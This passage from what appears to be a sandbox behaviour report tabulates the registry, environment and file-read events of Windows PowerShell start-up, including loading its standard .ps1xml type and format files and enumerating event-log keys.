| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Environment | Set Environment String | name = PSMODULEPATH, value = C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096 |
|
3 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096 |
|
41 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
5 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 4096 |
|
17 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 3022 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 50, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 281 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 4096 |
|
62 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 3895 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 201, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 4096 |
|
21 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 3687 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 409, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 4096 |
|
4 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 2228 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 844, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 4096 |
|
4 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 3736 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 360, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
7 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
